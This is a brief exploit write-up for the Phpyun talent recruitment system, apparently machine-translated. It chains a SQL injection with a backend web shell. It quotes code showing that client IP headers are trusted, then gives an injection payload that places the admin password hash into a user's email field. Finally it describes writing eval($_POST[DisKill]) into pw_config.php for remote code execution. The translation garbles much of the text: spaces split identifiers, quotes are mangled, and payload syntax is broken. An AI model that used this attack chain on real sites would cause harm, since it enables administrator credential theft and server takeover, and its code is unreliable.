Phpyun Talent System injection + background getshell

/Model/class/action. class. php row 603 function fun_ip_get () {if (getenv ("HTTP_CLIENT_IP") & strcasecmp (getenv ("HTTP_CLIENT_IP"), "unknown ")) {$ ip = getenv ("HTTP_CLIENT_IP");} else if (getenv ("HTTP_X_FORWARDED_FOR") & strcasecmp (getenv ("HTTP_X_FORWARDED_FOR"), "unknown ")) {$ ip = getenv ("HTTP_X_FORWARDED_FOR");} else if (getenv ("REMOTE_ADDR") & strcasecmp (getenv ("REMOTE_ADDR"), "unknown") {$ ip = Getenv ("REMOTE_ADDR");} else if (isset ($ _ SERVER ['remote _ ADDR ']) & $ _ SERVER ['remote _ ADDR '] & strcasecmp ($ _ SERVER ['remote _ ADDR'], "unknown ")) {$ ip = $ _ SERVER ['remote _ ADDR '];} else {$ ip = "unknown";} return ($ ip);} exp: register an individual member. then, counterfeit the ip id during login. After the First Login is packet capture, you can view the email and manage the 32-bit md5127.1 ′, 'email '= (select password from phpyun_admin_user where username = 'admin') where 'uid' = 1 # uid can be captured during logon. backend getshell funct Ion save_action () {extract ($ _ POST); $ config = "<? Php "; $ uc_config = str_replace (" '","' ", $ uc_config); $ uc_config = str_replace (" ",", $ uc_config ); $ uc_config = str_replace ("\ '", ", $ uc_config); $ uc_config = str_replace (" \' ",", $ uc_config ); $ uc_config = str_replace ("\ '", ", $ uc_config); $ uc_config = str_replace ("' ",", $ uc_config ); $ uc_config = str_replace ("'", ", $ uc_config); $ uc_config = str_replace (" \ "", ", $ uc_config); $ config. = $ uc_config; $ path = APP_PATH. "/api/pw_api/pw_config.php"; $ fp = @ fopen ($ path, "w"); fwrite ($ fp, $ config); fclose ($ fp ); filter a lot. however, we have no choice but to enter the background-> website tools-> integrate pw to insert eval ($ _ POST [DisKill]) at the end; Enable pw with one sentence address: http://www.bkjia.com /Api/pw_api/pw_config.php